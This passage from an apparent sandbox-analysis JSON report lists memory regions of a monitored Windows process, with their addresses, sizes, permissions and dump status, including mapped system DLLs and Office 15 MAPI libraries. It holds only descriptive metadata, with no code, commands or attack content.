"dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 12976128, "type": "region", "version": 1 }, "end_va": 25559039, "entry_point": 0, "filename": null, "id": "region_1902", "name": "pagefile_0x0000000000c60000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 12976128, "timestamp": "00:01:25.531", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1906", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:25.548", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_1907", "name": "private_0x0000000000040000", "norm_filename": null, "region_type": "private_memory", "start_va": 262144, "timestamp": "00:01:25.548", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1971978240, "type": "region", "version": 1 }, "end_va": 1984864255, "entry_point": 1972508161, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_1908", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1971978240, "timestamp": "00:01:25.549", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1991507968, "type": "region", "version": 1 }, "end_va": 1991864319, "entry_point": 1991613350, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_1909", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1991507968, "timestamp": "00:01:25.550", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3993600, "start_va": 1665335296, "type": "region", "version": 1 }, "end_va": 1669328895, "entry_point": 1665335296, "filename": "\\PROGRA~1\\MICROS~1\\Office15\\OLMAPI32.DLL", "id": "region_1974", "name": "olmapi32.dll", "norm_filename": "c:\\progra~1\\micros~1\\office15\\olmapi32.dll", "region_type": "memory_mapped_file", "start_va": 1665335296, "timestamp": "00:01:25.971", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 335871, "entry_point": 0, "filename": null, "id": "region_1990", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:26.113", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 782336, "start_va": 1898577920, "type": "region", "version": 1 }, "end_va": 1899360255, "entry_point": 1898651132, "filename": "\\Windows\\System32\\msvcr100.dll", "id": "region_1991", "name": "msvcr100.dll", "norm_filename": "c:\\windows\\system32\\msvcr100.dll", "region_type": "memory_mapped_file", "start_va": 1898577920, "timestamp": "00:01:26.113", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1638400, "start_va": 1938030592, "type": "region", "version": 1 }, "end_va": 1939668991, "entry_point": 1938673702, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll", "id": "region_1992", "name": "gdiplus.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll", "region_type": "memory_mapped_file", "start_va": 1938030592, "timestamp": "00:01:26.115", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1955856384, "type": "region", "version": 1 }, "end_va": 1955893247, "entry_point": 1955861024, "filename": "\\Windows\\System32\\version.dll", "id": "region_1993", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 1955856384, "timestamp": "00:01:26.117", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 430080, "start_va": 1898119168, "type": "region", "version": 1 }, "end_va": 1898549247, "entry_point": 1898331380, "filename": "\\Windows\\System32\\msvcp100.dll", "id": "region_1994", "name": "msvcp100.dll", "norm_filename": "c:\\windows\\system32\\msvcp100.dll", "region_type": "memory_mapped_file", "start_va": 1898119168, "timestamp": "00:01:26.118", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000013-region_00001995-addr_0x0000000000610000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_304", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 6356992, "type": "region", "version": 1 }, "end_va": 7405567, "entry_point": 0, "filename": null, "id": "region_1995", "name": "private_0x0000000000610000", "norm_filename": null, "region_type": "private_memory", "start_va": 6356992, "timestamp": "00:01:26.121", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_1996", "name": "private_0x0000000000060000", "norm_filename": null, "region_type": "private_memory", "start_va": 393216, "timestamp": "00:01:26.204", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2818048, "type": "region", "version": 1 }, "end_va": 2822143, "entry_point": 0, "filename": null, "id": "region_1997", "name": "private_0x00000000002b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2818048, "timestamp": "00:01:26.204", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 7405568, "type": "region", "version": 1 }, "end_va": 10350591, "entry_point": 7405568, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1998", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 7405568, "timestamp": "00:01:26.255", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1948975104, "type": "region", "version": 1 }, "end_va": 1950670847, "entry_point": 1949165237, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_1999", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1948975104, "timestamp": "00:01:26.267", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 2887679, "entry_point": 2883584, "filename": "\\Windows\\WindowsShell.Manifest", "id": "region_2000", "name": "windowsshell.manifest", "norm_filename": "c:\\windows\\windowsshell.manifest", "region_type": "memory_mapped_file", "start_va": 2883584, "timestamp": "00:01:26.269", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 2949120, "type": "region", "version": 1 }, "end_va": 2957311, "entry_point": 0, "filename": null, "id": "region_2001", "name": "pagefile_0x00000000002d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2949120, "timestamp": "00:01:26.269", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 5439488, "type": "region", "version": 1 }, "end_va": 5701631, "entry_point": 0, "filename": null, "id": "region_2002", "name": "private_0x0000000000530000", "norm_filename": null, "region_type": "private_memory", "start_va": 5439488, "timestamp": "00:01:26.271", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1966342144, "type": "region", "version": 1 }, "end_va": 1966391295, "entry_point": 1966346465, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_2003", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1966342144, "timestamp": "00:01:26.272", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 376832, "start_va": 5701632, "type": "region", "version": 1 }, "end_va": 6078463, "entry_point": 5846457, "filename": "\\Windows\\System32\\rpcss.dll", "id": "region_2004", "name": "rpcss.dll", "norm_filename": "c:\\windows\\system32\\rpcss.dll", "region_type": "memory_mapped_file", "start_va": 5701632, "timestamp": "00:01:26.285", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 655360, "start_va": 10813440, "type": "region", "version": 1 }, "end_va": 11468799, "entry_point": 0, "filename": null, "id": "region_2005", "name": "private_0x0000000000a50000", "norm_filename": null, "region_type": "private_memory", "start_va": 10813440, "timestamp": "00:01:26.285", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 1939668992, "type": "region", "version": 1 }, "end_va": 1939931135, "entry_point": 1939710685, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_2007", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1939668992, "timestamp": "00:01:26.289", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000013-region_00002008-addr_0x0000000000af0000-size_0x0000000000140000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_305", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1310720, "start_va": 11468800, "type": "region", "version": 1 }, "end_va": 12779519, "entry_point": 0, "filename": null, "id": "region_2008", "name": "private_0x0000000000af0000", "norm_filename": null, "region_type": "private_memory", "start_va": 11468800, "timestamp": "00:01:26.291", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 6356992, "type": "region", "version": 1 }, "end_va": 7270399, "entry_point": 0, "filename": null, "id": "region_2009", "name": "pagefile_0x0000000000610000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6356992, "timestamp": "00:01:26.301", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 7340032, "type": "region", "version": 1 }, "end_va": 7405567, "entry_point": 0, "filename": null, "id": "region_2010", "name": "private_0x0000000000700000", "norm_filename": null, "region_type": "private_memory", "start_va": 7340032, "timestamp": "00:01:26.301", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 26099712, "start_va": 1759510528, "type": "region", "version": 1 }, "end_va": 1785610239, "entry_point": 1767141051, "filename": "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\MSO.DLL", "id": "region_2011", "name": "mso.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\mso.dll", "region_type": "memory_mapped_file", "start_va": 1759510528, "timestamp": "00:01:26.309", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 2891775, "entry_point": 0, "filename": null, "id": "region_2012", "name": "pagefile_0x00000000002c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2883584, "timestamp": "00:01:26.313", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1912340480, "type": "region", "version": 1 }, "end_va": 1912360959, "entry_point": 1912344822, "filename": "\\Windows\\System32\\msimg32.dll", "id": "region_2013", "name": "msimg32.dll", "norm_filename": "c:\\windows\\system32\\msimg32.dll", "region_type": "memory_mapped_file", "start_va": 1912340480, "timestamp": "00:01:26.313", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 3014656, "type": "region", "version": 1 }, "end_va": 3055615, "entry_point": 0, "filename": null, "id": "region_2014", "name": "private_0x00000000002e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3014656, "timestamp": "00:01:26.315", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": null, "size": 65536, "start_va": 3080192, "type": "region", "version": 1 }, "end_va": 3145727, "entry_point": 0, "filename": null, "id": "region_2015", "name": "private_0x00000000002f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3080192, "timestamp": "00:01:26.317", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000013-region_00002016-addr_0x0000000000570000-size_0x0000000000020000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_306", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 5701632, "type": "region", "version": 1 }, "end_va": 5832703, "entry_point": 0, "filename": null, "id": "region_2016", "name": "private_0x0000000000570000", "norm_filename": null, "region_type": "private_memory", "start_va": 5701632, "timestamp": "00:01:26.332", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2359296, "start_va": 1895563264, "type": "region", "version": 1 }, "end_va": 1897922559, "entry_point": 1895589565, "filename": "\\Windows\\System32\\msi.dll", "id": "region_2017", "name": "msi.dll", "norm_filename": "c:\\windows\\system32\\msi.dll", "region_type": "memory_mapped_file", "start_va": 1895563264, "timestamp": "00:01:26.335", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 5242880, "start_va": 1890320384, "type": "region", "version": 1 }, "end_va": 1895563263, "entry_point": 1890320384, "filename": "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\Cultures\\OFFICE.ODF", "id": "region_2018", "name": "office.odf", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\cultures\\office.odf", "region_type": "memory_mapped_file", "start_va": 1890320384, "timestamp": "00:01:26.353", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1261568, "start_va": 1865744384, "type": "region", "version": 1 }, "end_va": 1867005951, "entry_point": 1865744384, "filename": "\\PROGRA~1\\MICROS~1\\Office15\\1033\\MAPIR.DLL", "id": "region_2019", "name": "mapir.dll", "norm_filename": "c:\\progra~1\\micros~1\\office15\\1033\\mapir.dll", "region_type": "memory_mapped_file", "start_va": 1865744384, "timestamp": "00:01:26.400", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 11468800, "type": "region", "version": 1 }, "end_va": 11993087, "entry_point": 0, "filename": null, "id": "region_2020", "name": "private_0x0000000000af0000", "norm_filename": null, "region_type": "private_memory", "start_va": 11468800, "timestamp": "00:01:26.404", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 12517376, "type": "region", "version": 1 }, "end_va": 12779519, "entry_point": 0, "filename": null, "id": "region_2021", "name": "private_0x0000000000bf0000", "norm_filename": null, "region_type": "private_memory", "start_va": 12517376, "timestamp": "00:01:26.404", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8388608, "start_va": 25559040, "type": "region", "version": 1 }, "end_va": 33947647, "entry_point": 0, "filename": null, "id": "region_2022", "name": "pagefile_0x0000000001860000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 25559040, "timestamp": "00:01:26.408", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 5701632, "type": "region", "version": 1 }, "end_va": 5713919, "entry_point": 0, "filename": null, "id": "region_2023", "name": "pagefile_0x0000000000570000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5701632, "timestamp": "00:01:26.409", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 5767168, "type": "region", "version": 1 }, "end_va": 5832703, "entry_point": 0, "filename": null, "id": "region_2024", "name": "private_0x0000000000580000", "norm_filename": null, "region_type": "private_memory", "start_va": 5767168, "timestamp": "00:01:26.410", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 34340864, "type": "region", "version": 1 }, "end_va": 35389439, "entry_point": 0, "filename": null, "id": "region_2025", "name": "private_0x00000000020c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 34340864, "timestamp": "00:01:26.410", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 36175872, "type": "region", "version": 1 }, "end_va": 37224447, "entry_point": 0, "filename": null, "id": "region_2026", "name": "private_0x0000000002280000", "norm_filename": null, "region_type": "private_memory", "start_va": 36175872, "timestamp": "00:01:26.410", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147336192, "type": "region", "version": 1 }, "end_va": 2147340287, "entry_point": 0, "filename": null, "id": "region_2027", "name": "private_0x000000007ffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147336192, "timestamp": "00:01:26.410", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_2028", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, "timestamp": "00:01:26.410", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 5832704, "type": "region", "version": 1 }, "end_va": 5840895, "entry_point": 0, "filename": null, "id": "region_2029", "name": "pagefile_0x0000000000590000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5832704, "timestamp": "00:01:26.411", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 38141952, "type": "region", "version": 1 }, "end_va": 39190527, "entry_point": 0, "filename": null, "id": "region_2030", "name": "private_0x0000000002460000", "norm_filename": null, "region_type": "private_memory", "start_va": 38141952, "timestamp": "00:01:26.418", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 77824, "start_va": 1936588800, "type": "region", "version": 1 }, "end_va": 1936666623, "entry_point": 1936596287, "filename": "\\Windows\\System32\\dwmapi.dll", "id": "region_2031", "name": "dwmapi.dll", "norm_filename": "c:\\windows\\system32\\dwmapi.dll", "region_type": "memory_mapped_file", "start_va": 1936588800, "timestamp": "00:01:26.418", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147332096, "type": "region", "version": 1 }, "end_va": 2147336191, "entry_point": 0, "filename": null, "id": "region_2032", "name": "private_0x000000007ffdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147332096, "timestamp": "00:01:26.418", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8388608, "start_va": 39190528, "type": "region", "version": 1 }, "end_va": 47579135, "entry_point": 0, "filename": null, "id": "region_2033", "name": "pagefile_0x0000000002560000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 39190528, "timestamp": "00:01:26.422", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1052672, "start_va": 47579136, "type": "region", "version": 1 }, "end_va": 48631807, "entry_point": 0, "filename": null, "id": "region_2034", "name": "private_0x0000000002d60000", "norm_filename": null, "region_type": "private_memory", "start_va": 47579136, "timestamp": "00:01:26.422", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 135168, "start_va": 1954545664, "type": "region", "version": 1 }, "end_va": 1954680831, "entry_point": 1954550878, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_2035", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 1954545664, "timestamp": "00:01:26.424", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 282624, "start_va": 2000814080, "type": "region", "version": 1 }, "end_va": 2001096703, "entry_point": 2000818657, "filename": "\\Windows\\System32\\Wldap32.dll", "id": "region_2036", "name": "wldap32.dll", "norm_filename": "c:\\windows\\system32\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 2000814080, "timestamp": "00:01:26.425", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1630208, "start_va": 1672675328, "type": "region", "version": 1 }, "end_va": 1674305535, "entry_point": 1672680232, "filename": "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\RICHED20.DLL", "id": "region_2037", "name": "riched20.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\riched20.dll", "region_type": "memory_mapped_file", "start_va": 1672675328, "timestamp": "00:01:26.435", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 5898240, "type": "region", "version": 1 }, "end_va": 5902335, "entry_point": 0, "filename": null, "id": "region_2038", "name": "private_0x00000000005a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5898240, "timestamp": "00:01:26.447", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 5963776, "type": "region", "version": 1 }, "end_va": 5967871, "entry_point": 0, "filename": null, "id": "region_2039", "name": "pagefile_0x00000000005b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5963776, "timestamp": "00:01:26.447", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 47579136, "type": "region", "version": 1 }, "end_va": 48627711, "entry_point": 0, "filename": null, "id": "region_2040", "name": "private_0x0000000002d60000", "norm_filename": null, "region_type": "private_memory", "start_va": 47579136, "timestamp": "00:01:26.452", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 143360, "start_va": 1865547776, "type": "region", "version": 1 }, "end_va": 1865691135, "entry_point": 1865547776, "filename": "\\PROGRA~1\\MICROS~1\\Office15\\CONTAB32.DLL", "id": "region_2041", "name": "contab32.dll", "norm_filename": "c:\\progra~1\\micros~1\\office15\\contab32.dll", "region_type": "memory_mapped_file", "start_va": 1865547776, "timestamp": "00:01:26.482", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 6029312, "type": "region", "version": 1 }, "end_va": 6037503, "entry_point": 0, "filename": null, "id": "region_2042", "name": "pagefile_0x00000000005c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6029312, "timestamp": "00:01:26.496", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1991901184, "type": "region", "version": 1 }, "end_va": 1992486911, "entry_point": 1991917489, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_2043", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1991901184, "timestamp": "00:01:26.496", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 761856, "start_va": 1814036480, "type": "region", "version": 1 